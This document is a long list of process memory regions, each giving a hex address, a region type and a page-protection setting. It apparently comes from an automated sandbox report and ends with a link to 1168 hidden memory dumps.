trusted library allocation
page read and write
5AB0000
trusted library allocation
page read and write
5469000
trusted library allocation
page read and write
2D0C000
stack
page read and write
2E6D000
trusted library allocation
page read and write
50F7000
trusted library allocation
page read and write
2A05000
trusted library allocation
page read and write
4F90000
trusted library allocation
page read and write
2A9F000
trusted library allocation
page read and write
6653000
trusted library allocation
page read and write
50FC000
trusted library allocation
page read and write
4BE1000
heap
page read and write
73EC000
heap
page read and write
29C0000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
29DD000
trusted library allocation
page read and write
2BD8000
trusted library allocation
page read and write
10ED000
heap
page read and write
54DD000
trusted library allocation
page read and write
4A18000
trusted library allocation
page read and write
780000
remote allocation
page execute and read and write
553F000
trusted library allocation
page read and write
2E3D000
trusted library allocation
page read and write
56DF000
trusted library allocation
page read and write
7D7000
stack
page read and write
576B000
trusted library allocation
page read and write
2E86000
trusted library allocation
page read and write
5243000
trusted library allocation
page read and write
5138000
trusted library allocation
page read and write
54E7000
trusted library allocation
page read and write
5440000
heap
page read and write
5DD0000
trusted library allocation
page read and write
544A000
trusted library allocation
page read and write
2F14000
trusted library allocation
page read and write
2B8D000
trusted library allocation
page read and write
4FE0000
trusted library allocation
page read and write
2A26000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
2A45000
trusted library allocation
page read and write
2AF7000
trusted library allocation
page read and write
54AE000
stack
page read and write
5791000
trusted library allocation
page read and write
A05000
heap
page read and write
54DF000
trusted library allocation
page read and write
6F3D000
stack
page read and write
2E42000
trusted library allocation
page read and write
5014000
trusted library allocation
page read and write
2600000
heap
page execute and read and write
2A09000
trusted library allocation
page read and write
51E2000
trusted library allocation
page read and write
D5D000
heap
page read and write
D75000
heap
page read and write
4F93000
heap
page read and write
4B1E000
stack
page read and write
2AD8000
trusted library allocation
page read and write
2BB5000
trusted library allocation
page read and write
56CD000
trusted library allocation
page read and write
587E000
stack
page read and write
FF0000
heap
page read and write
8090000
trusted library allocation
page execute and read and write
CF0000
trusted library allocation
page read and write
517C000
trusted library allocation
page read and write
2A2C000
trusted library allocation
page read and write
5159000
trusted library allocation
page read and write
5715000
trusted library allocation
page read and write
54BE000
trusted library allocation
page read and write
2C81000
trusted library allocation
page read and write
5491000
trusted library allocation
page read and write
2BF1000
trusted library allocation
page read and write
4E40000
remote allocation
page read and write
4E93000
trusted library allocation
page read and write
505B000
trusted library allocation
page read and write
8380000
heap
page read and write
A21000
unkown
page write copy
575B000
trusted library allocation
page read and write
5541000
trusted library allocation
page read and write
5E8D000
stack
page read and write
2EB0000
trusted library allocation
page read and write
4FB2000
trusted library allocation
page read and write
567C000
trusted library allocation
page read and write
50E7000
trusted library allocation
page read and write
2BE0000
heap
page read and write
4FCB000
trusted library allocation
page read and write
5D80000
trusted library allocation
page read and write
2BED000
trusted library allocation
page read and write
546B000
trusted library allocation
page read and write
6EBC000
heap
page read and write
71AE000
stack
page read and write
5048000
trusted library allocation
page read and write
5560000
heap
page execute and read and write
2D5E000
stack
page read and write
64A0000
remote allocation
page read and write
10AA000
heap
page read and write
5280000
trusted library allocation
page read and write
4950000
trusted library allocation
page execute and read and write
8E4000
trusted library allocation
page read and write
2DE0000
heap
page read and write
25DB000
trusted library allocation
page execute and read and write
2A90000
trusted library allocation
page read and write
2BEB000
trusted library allocation
page read and write
6711000
trusted library allocation
page read and write
492F000
stack
page read and write
6E60000
heap
page read and write
8120000
heap
page read and write
5796000
trusted library allocation
page read and write
2A7B000
trusted library allocation
page read and write
2E39000
trusted library allocation
page read and write
4A6C000
stack
page read and write
2AAD000
trusted library allocation
page read and write
5202000
trusted library allocation
page read and write
576F000
trusted library allocation
page read and write
5161000
trusted library allocation
page read and write
2DBA000
trusted library allocation
page read and write
52D7000
trusted library allocation
page read and write
2C42000
trusted library allocation
page read and write
49A0000
trusted library allocation
page read and write
560D000
trusted library allocation
page read and write
551A000
trusted library allocation
page read and write
569F000
trusted library allocation
page read and write
6DF0000
trusted library allocation
page execute and read and write
4FE8000
trusted library allocation
page read and write
5424000
trusted library allocation
page read and write
4FEC000
trusted library allocation
page read and write
2B14000
trusted library allocation
page read and write
56E7000
trusted library allocation
page read and write
52D5000
trusted library allocation
page read and write
2B6C000
trusted library allocation
page read and write
24050E2F000
heap
page read and write
925C000
stack
page read and write
74E0000
trusted library allocation
page execute and read and write
5733000
trusted library allocation
page read and write
5262000
trusted library allocation
page read and write
944000
heap
page read and write
5C40000
heap
page read and write
2E31000
trusted library allocation
page read and write
2DBC000
trusted library allocation
page read and write
5711000
trusted library allocation
page read and write
4D10000
trusted library section
page read and write
2C20000
heap
page read and write
5C35000
heap
page read and write
563D000
trusted library allocation
page read and write
53D9000
trusted library allocation
page read and write
56F8000
trusted library allocation
page read and write
5E15000
trusted library allocation
page read and write
6C2D000
stack
page read and write
2D10000
trusted library allocation
page read and write
8490000
trusted library allocation
page execute and read and write
4F99000
heap
page read and write
81E0000
trusted library allocation
page read and write
5057000
trusted library allocation
page read and write
2BAD000
trusted library allocation
page read and write
5273000
trusted library allocation
page read and write
54C0000
trusted library allocation
page read and write
2AAB000
trusted library allocation
page read and write
55F7000
trusted library allocation
page read and write
2E2D000
trusted library allocation
page execute and read and write
2BE9000
trusted library allocation
page read and write
8FD5000
heap
page read and write
489D000
stack
page read and write
4942000
trusted library allocation
page read and write
563F000
trusted library allocation
page read and write
24050E22000
heap
page read and write
5511000
trusted library allocation
page read and write
1094000
trusted library allocation
page read and write
50B3000
trusted library allocation
page read and write
2B5B000
trusted library allocation
page read and write
2BDC000
trusted library allocation
page read and write
2B4D000
trusted library allocation
page read and write
2DEC000
trusted library allocation
page read and write
6F7B000
stack
page read and write
5143000
trusted library allocation
page read and write
4FB6000
trusted library allocation
page read and write
5215000
trusted library allocation
page read and write
402000
remote allocation
page execute and read and write
5176000
trusted library allocation
page read and write
79C000
stack
page read and write
5200000
trusted library allocation
page read and write
552C000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
D2A000
trusted library allocation
page execute and read and write
2A5A000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
27EE000
stack
page read and write
7080000
heap
page read and write
2ADC000
trusted library allocation
page read and write
504A000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
5249000
trusted library allocation
page read and write
4FB4000
trusted library allocation
page read and write
5D1F000
trusted library allocation
page read and write
5575000
trusted library allocation
page read and write
2DB8000
trusted library allocation
page read and write
50A2000
trusted library allocation
page read and write
702E000
stack
page read and write
54CC000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
2BBD000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
570D000
trusted library allocation
page read and write
540B000
trusted library allocation
page read and write
2DEA000
trusted library allocation
page read and write
5754000
trusted library allocation
page read and write
706E000
stack
page read and write
2B40000
trusted library allocation
page read and write
2E69000
trusted library allocation
page read and write
10C4000
heap
page read and write
5125000
trusted library allocation
page read and write
8F9C000
heap
page read and write
56EE000
stack
page read and write
2BD0000
trusted library allocation
page read and write
55F4000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
5633000
trusted library allocation
page read and write
5F1E000
stack
page read and write
8820000
trusted library section
page read and write
522D000
stack
page read and write
6EFA000
stack
page read and write
2D9B000
trusted library allocation
page read and write
5178000
trusted library allocation
page read and write
49C0000
trusted library allocation
page read and write
5DC0000
trusted library allocation
page read and write
2E6B000
trusted library allocation
page read and write
9270000
trusted library section
page read and write
2D99000
trusted library allocation
page read and write
2E67000
trusted library allocation
page read and write
55EA000
trusted library allocation
page read and write
2A6F000
trusted library allocation
page read and write
252E000
stack
page read and write
7090000
trusted library allocation
page execute and read and write
5245000
trusted library allocation
page read and write
5501000
trusted library allocation
page read and write
2EB4000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
6ED2000
heap
page read and write
5037000
trusted library allocation
page read and write
29B0000
trusted library allocation
page read and write
50A4000
trusted library allocation
page read and write
50DC000
trusted library allocation
page read and write
65C000
stack
page read and write
5693000
trusted library allocation
page read and write
2B85000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
2DF1000
trusted library allocation
page read and write
50ED000
trusted library allocation
page read and write
BD7000
heap
page read and write
2A41000
trusted library allocation
page read and write
4E77000
trusted library allocation
page read and write
81C5000
trusted library allocation
page read and write
5789000
trusted library allocation
page read and write
5044000
trusted library allocation
page read and write
2C3A000
trusted library allocation
page execute and read and write
501A000
trusted library allocation
page read and write
B30000
heap
page read and write
2E00000
trusted library section
page read and write
6EBD000
stack
page read and write
2AB1000
trusted library allocation
page read and write
136F000
stack
page read and write
5C1C000
heap
page read and write
2DB2000
trusted library allocation
page read and write
29F4000
trusted library allocation
page read and write
5164000
trusted library allocation
page read and write
5059000
trusted library allocation
page read and write
644000
unkown
page readonly
54C6000
trusted library allocation
page read and write
56A1000
trusted library allocation
page read and write
5685000
trusted library allocation
page read and write
4980000
trusted library allocation
page execute and read and write
2E07000
trusted library allocation
page read and write
56F4000
trusted library allocation
page read and write
51DC000
trusted library allocation
page read and write
8370000
heap
page read and write
6DE0000
trusted library allocation
page read and write
50A0000
trusted library allocation
page read and write
5136000
trusted library allocation
page read and write
4249000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
5023000
trusted library allocation
page read and write
10D8000
heap
page read and write
D10000
trusted library allocation
page read and write
51C7000
trusted library allocation
page read and write
517A000
trusted library allocation
page read and write
154439D0000
heap
page read and write
8180000
trusted library allocation
page execute and read and write
2820000
heap
page execute and read and write
5172000
trusted library allocation
page read and write
5C0E000
stack
page read and write
2DC9000
trusted library allocation
page read and write
51F3000
trusted library allocation
page read and write
5682000
trusted library allocation
page read and write
5646000
trusted library allocation
page read and write
2876000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
5191000
trusted library allocation
page read and write
107E000
stack
page read and write
7450000
trusted library allocation
page execute and read and write
571B000
trusted library allocation
page read and write
756F000
stack
page read and write
8F6C000
stack
page read and write
A22000
unkown
page readonly
830E000
stack
page read and write
525C000
trusted library allocation
page read and write
29FF000
trusted library allocation
page read and write
2A66000
trusted library allocation
page read and write
506E000
trusted library allocation
page read and write
54FA000
trusted library allocation
page read and write
4960000
trusted library allocation
page read and write
5654000
trusted library allocation
page read and write
2B19000
trusted library allocation
page read and write
5296000
trusted library allocation
page read and write
2E39000
trusted library allocation
page read and write
7F470000
trusted library allocation
page execute and read and write
529A000
trusted library allocation
page read and write
2B2D000
trusted library allocation
page read and write
2E05000
trusted library allocation
page read and write
514B000
trusted library allocation
page read and write
76EB000
stack
page read and write
2B46000
trusted library allocation
page read and write
513B000
trusted library allocation
page read and write
4D00000
heap
page execute and read and write
6E7A000
stack
page read and write
4A0E000
stack
page read and write
5279000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
511D000
trusted library allocation
page read and write
5D0E000
stack
page read and write
4FC5000
trusted library allocation
page read and write
51A6000
trusted library allocation
page read and write
5C4E000
heap
page read and write
7499000
trusted library allocation
page read and write
268E000
stack
page read and write
10D4000
heap
page read and write
5742000
trusted library allocation
page read and write
54F8000
trusted library allocation
page read and write
5221000
trusted library allocation
page read and write
29EE000
trusted library allocation
page read and write
5223000
trusted library allocation
page read and write
4E6C000
trusted library allocation
page read and write
7317000
trusted library allocation
page read and write
4990000
trusted library allocation
page read and write
2E37000
trusted library allocation
page read and write
5D90000
trusted library allocation
page execute and read and write
50C7000
trusted library allocation
page read and write
52C1000
trusted library allocation
page read and write
A40000
heap
page read and write
5573000
trusted library allocation
page read and write
5C39000
heap
page read and write
572E000
trusted library allocation
page read and write
50D6000
trusted library allocation
page read and write
4E8E000
stack
page read and write
2E71000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
5376000
trusted library allocation
page read and write
5206000
trusted library allocation
page read and write
56CA000
trusted library allocation
page read and write
54D7000
trusted library allocation
page read and write
568F000
trusted library allocation
page read and write
5517000
trusted library allocation
page read and write
5552000
trusted library allocation
page read and write
4FFF000
trusted library allocation
page read and write
24051000000
heap
page read and write
522F000
trusted library allocation
page read and write
9E7000
heap
page read and write
869E000
stack
page read and write
2B25000
trusted library allocation
page read and write
597E000
stack
page read and write
50E0000
trusted library allocation
page read and write
2DE2000
trusted library allocation
page read and write
52AE000
trusted library allocation
page read and write
511B000
trusted library allocation
page read and write
5C3E000
heap
page read and write
2B2F000
trusted library allocation
page read and write
5112000
trusted library allocation
page read and write
5070000
trusted library allocation
page read and write
5639000
trusted library allocation
page read and write
BDE000
stack
page read and write
4B5E000
stack
page read and write
55FD000
trusted library allocation
page read and write
2A28000
trusted library allocation
page read and write
2DDE000
stack
page read and write
56CF000
trusted library allocation
page read and write
752E000
stack
page read and write
5515000
trusted library allocation
page read and write
4E7F000
trusted library allocation
page read and write
6E3C000
stack
page read and write
49B5000
trusted library allocation
page read and write
29DB000
trusted library allocation
page read and write
2CB0000
trusted library allocation
page execute and read and write
543D000
trusted library allocation
page read and write
5382000
trusted library allocation
page read and write
2B66000
trusted library allocation
page read and write
52EC000
trusted library allocation
page read and write
5689000
trusted library allocation
page read and write
722E000
stack
page read and write
5AB4000
trusted library allocation
page read and write
5771000
trusted library allocation
page read and write
6F50000
trusted library section
page read and write
54E5000
trusted library allocation
page read and write
2CC0000
heap
page read and write
50F3000
trusted library allocation
page read and write
3E69000
trusted library allocation
page read and write
56FF000
trusted library allocation
page read and write
A21000
unkown
page read and write
2B7F000
trusted library allocation
page read and write
64C27BF000
stack
page read and write
50E9000
trusted library allocation
page read and write
D03000
trusted library allocation
page execute and read and write
53EE000
trusted library allocation
page read and write
26E0000
heap
page read and write
2BD0000
trusted library section
page read and write
56DD000
trusted library allocation
page read and write
54C4000
trusted library allocation
page read and write
25F0000
trusted library allocation
page read and write
523F000
trusted library allocation
page read and write
A22000
unkown
page readonly
52D3000
trusted library allocation
page read and write
8C4000
trusted library allocation
page read and write
7393000
heap
page read and write
5578000
trusted library allocation
page read and write
60DE000
stack
page read and write
8220000
trusted library allocation
page read and write
51BF000
trusted library allocation
page read and write
56BE000
trusted library allocation
page read and write
2674000
trusted library allocation
page read and write
D00000
trusted library allocation
page read and write
2E46000
trusted library allocation
page execute and read and write
510A000
trusted library allocation
page read and write
8360000
trusted library allocation
page read and write
4F8E000
stack
page read and write
2E35000
trusted library allocation
page read and write
5456000
trusted library allocation
page read and write
2E23000
trusted library allocation
page execute and read and write
5157000
trusted library allocation
page read and write
DB21FC000
stack
page read and write
2B10000
trusted library allocation
page read and write
556B000
trusted library allocation
page read and write
2A0B000
trusted library allocation
page read and write
54E1000
trusted library allocation
page read and write
4E7B000
trusted library allocation
page read and write
81D0000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
51EE000
stack
page read and write
2B71000
trusted library allocation
page read and write
8F80000
heap
page read and write
55FF000
trusted library allocation
page read and write
2BB1000
trusted library allocation
page read and write
86DD000
stack
page read and write
D3D000
heap
page read and write
51C5000
trusted library allocation
page read and write
2C47000
trusted library allocation
page execute and read and write
541A000
trusted library allocation
page read and write
2EAA000
trusted library allocation
page read and write
934000
heap
page read and write
279E000
stack
page read and write
2BCC000
trusted library allocation
page read and write
75AE000
stack
page read and write
64C26B9000
stack
page read and write
519B000
trusted library allocation
page read and write
560F000
trusted library allocation
page read and write
4FAE000
trusted library allocation
page read and write
4F90000
heap
page read and write
5758000
trusted library allocation
page read and write
2E50000
heap
page read and write
566D000
trusted library allocation
page read and write
80B0000
trusted library allocation
page read and write
7460000
trusted library allocation
page read and write
2BCE000
trusted library allocation
page read and write
4FAC000
trusted library allocation
page read and write
55EE000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
24050E10000
heap
page read and write
5197000
trusted library allocation
page read and write
29FD000
trusted library allocation
page read and write
D40000
heap
page read and write
51C1000
trusted library allocation
page read and write
2D50000
heap
page execute and read and write
552A000
trusted library allocation
page read and write
7070000
heap
page read and write
76A0000
trusted library allocation
page read and write
3A72000
trusted library allocation
page read and write
5750000
trusted library allocation
page read and write
2A71000
trusted library allocation
page read and write
578D000
trusted library allocation
page read and write
6E65000
heap
page read and write
56E5000
trusted library allocation
page read and write
576D000
trusted library allocation
page read and write
4FEA000
trusted library allocation
page read and write
6E52000
heap
page read and write
2B9A000
trusted library allocation
page read and write
907000
trusted library allocation
page execute and read and write
26CC000
stack
page read and write
24050E00000
heap
page read and write
5554000
trusted library allocation
page read and write
52A9000
trusted library allocation
page read and write
4BD2000
trusted library allocation
page read and write
8E0000
trusted library allocation
page read and write
2DA0000
trusted library allocation
page read and write
2C52000
heap
page read and write
7330000
heap
page read and write
5302000
trusted library allocation
page read and write
DB247E000
stack
page read and write
50DE000
trusted library allocation
page read and write
4FC7000
trusted library allocation
page read and write
50AD000
trusted library allocation
page read and write
7D8000
stack
page read and write
8C3000
trusted library allocation
page execute and read and write
555A000
trusted library allocation
page read and write
8E7000
trusted library allocation
page read and write
870000
heap
page read and write
2A43000
trusted library allocation
page read and write
2B2B000
trusted library allocation
page read and write
5292000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
2BC0000
heap
page read and write
2B32000
trusted library allocation
page read and write
28B6000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
546D000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
53F2000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
5719000
trusted library allocation
page read and write
570F000
trusted library allocation
page read and write
514D000
trusted library allocation
page read and write
2E54000
trusted library allocation
page read and write
2EB6000
trusted library allocation
page read and write
55E8000
trusted library allocation
page read and write
2DCB000
trusted library allocation
page read and write
880000
heap
page read and write
25D0000
trusted library allocation
page read and write
572A000
trusted library allocation
page read and write
5D60000
trusted library allocation
page execute and read and write
4FDE000
trusted library allocation
page read and write
5787000
trusted library allocation
page read and write
24051130000
heap
page read and write
52CB000
trusted library allocation
page read and write
53FF000
trusted library allocation
page read and write
75ED000
stack
page read and write
5452000
trusted library allocation
page read and write
861D000
stack
page read and write
59FF000
stack
page read and write
B40000
heap
page read and write
6DB0000
trusted library allocation
page execute and read and write
2A6B000
trusted library allocation
page read and write
811D000
stack
page read and write
2B9C000
trusted library allocation
page read and write
2BAF000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
50F9000
trusted library allocation
page read and write
2D34000
trusted library allocation
page read and write
5701000
trusted library allocation
page read and write
24050E19000
heap
page read and write
8E30000
trusted library allocation
page execute and read and write
642000
unkown
page readonly
2F34000
trusted library allocation
page read and write
522C000
trusted library allocation
page read and write
51C3000
trusted library allocation
page read and write
5241000
trusted library allocation
page read and write
3A8D000
trusted library allocation
page read and write
2D1E000
stack
page read and write
4B71000
trusted library allocation
page read and write
53EC000
trusted library allocation
page read and write
51AE000
trusted library allocation
page read and write
2AB7000
trusted library allocation
page read and write
49CE000
stack
page read and write
2BA9000
trusted library allocation
page read and write
732E000
stack
page read and write
2E33000
trusted library allocation
page read and write
50C5000
trusted library allocation
page read and write
4FE2000
trusted library allocation
page read and write
5DB1000
trusted library allocation
page read and write
5484000
trusted library allocation
page read and write
29D5000
trusted library allocation
page read and write
5BFE000
stack
page read and write
D0D000
trusted library allocation
page execute and read and write
27A1000
trusted library allocation
page read and write
8350000
trusted library section
page read and write
2A77000
trusted library allocation
page read and write
2EAC000
trusted library allocation
page read and write
2D9D000
trusted library allocation
page read and write
5405000
trusted library allocation
page read and write
951000
heap
page read and write
2AD6000
trusted library allocation
page read and write
547C000
trusted library allocation
page read and write
56F6000
trusted library allocation
page read and write
BF0000
heap
page read and write
50BF000
trusted library allocation
page read and write
2650000
heap
page read and write
522A000
trusted library allocation
page read and write
52E8000
trusted library allocation
page read and write
2A7D000
trusted library allocation
page read and write
50F1000
trusted library allocation
page read and write
2697000
heap
page read and write
5025000
trusted library allocation
page read and write
5AFE000
stack
page read and write
5076000
trusted library allocation
page read and write
51E5000
trusted library allocation
page read and write
5B4E000
stack
page read and write
2E8E000
trusted library allocation
page read and write
2E3D000
trusted library allocation
page execute and read and write
BA0000
heap
page read and write
2DB4000
trusted library allocation
page read and write
61E0000
trusted library section
page read and write
2A07000
trusted library allocation
page read and write
2BD4000
trusted library allocation
page read and write
2DE6000
trusted library allocation
page read and write
2B81000
trusted library allocation
page read and write
2E29000
trusted library allocation
page read and write
154439E0000
heap
page read and write
3BD9000
trusted library allocation
page read and write
286E000
trusted library allocation
page read and write
5BCE000
stack
page read and write
4AAE000
stack
page read and write
2AE0000
heap
page read and write
55E6000
trusted library allocation
page read and write
52AB000
trusted library allocation
page read and write
5DA0000
trusted library allocation
page execute and read and write
541E000
trusted library allocation
page read and write
285D000
trusted library allocation
page read and write
2A58000
trusted library allocation
page read and write
2AAF000
trusted library allocation
page read and write
528E000
trusted library allocation
page read and write
6D80000
trusted library allocation
page execute and read and write
29F8000
trusted library allocation
page read and write
37A1000
trusted library allocation
page read and write
734D000
heap
page read and write
5266000
trusted library allocation
page read and write
2DEE000
trusted library allocation
page read and write
2BEB000
heap
page read and write
2B9E000
trusted library allocation
page read and write
51CB000
trusted library allocation
page read and write
2BC8000
heap
page read and write
There are 1168 hidden memdumps, click here to show them.